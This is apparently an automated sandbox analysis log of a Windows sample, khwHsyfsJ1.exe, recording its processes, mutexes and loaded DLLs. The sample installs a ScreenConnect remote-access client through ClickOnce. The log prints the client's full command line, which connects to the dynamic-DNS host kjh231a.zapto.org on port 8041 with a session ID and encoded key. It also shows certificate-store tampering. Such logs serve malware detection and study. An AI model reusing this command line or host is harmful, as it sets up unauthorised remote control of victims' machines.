                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00B61000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess652
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCommand line argument: dfshim0_2_00B61000
                  Source: khwHsyfsJ1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: khwHsyfsJ1.exeReversingLabs: Detection: 23%
                  Source: unknownProcess created: C:\Users\user\Desktop\khwHsyfsJ1.exe "C:\Users\user\Desktop\khwHsyfsJ1.exe"
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "22550ff7-91dc-46b5-a75f-0870a9ece610" "User"
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844
                  Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: dfshim.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: dfshim.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: dwrite.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: textshaping.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: textinputframework.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: coreuicomponents.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: coremessaging.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exe
                  Section loaded: wersvc.dll, windowsperformancerecordercontrol.dll, weretw.dll, xmllite.dll, wldp.dll, wer.dll, policymanager.dll, msvcp110_win.dll, faultrep.dll, dbghelp.dll, dbgcore.dll, wer.dll, policymanager.dll, msvcp110_win.dll, userenv.dll, profapi.dll, sspicli.dll, policymanager.dll, msvcp110_win.dll, kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, es.dll, bitsproxy.dll, ondemandconnroutehelper.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, dpapi.dll, mpr.dll, kernel.appcore.dll, wlidsvc.dll, ncrypt.dll, cryptsp.dll, profapi.dll, clipc.dll, dpapi.dll, ntasn1.dll, wldp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, msxml6.dll, msasn1.dll, winhttp.dll, netprofm.dll, iphlpapi.dll, policymanager.dll, msvcp110_win.dll, wtsapi32.dll, winsta.dll, gamestreamingext.dll, msauserext.dll, tbs.dll, npmproxy.dll, ondemandconnroutehelper.dll, sspicli.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, mswsock.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, gpapi.dll, cryptnet.dll, ncryptsslp.dll, elscore.dll, elstrans.dll, cryptngc.dll, devobj.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                  Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, dfshim.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                  Section loaded: apphelp.dll, mscoree.dll, kernel.appcore.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, propsys.dll, version.dll, profapi.dll, mscoree.dll, kernel.appcore.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, propsys.dll, version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
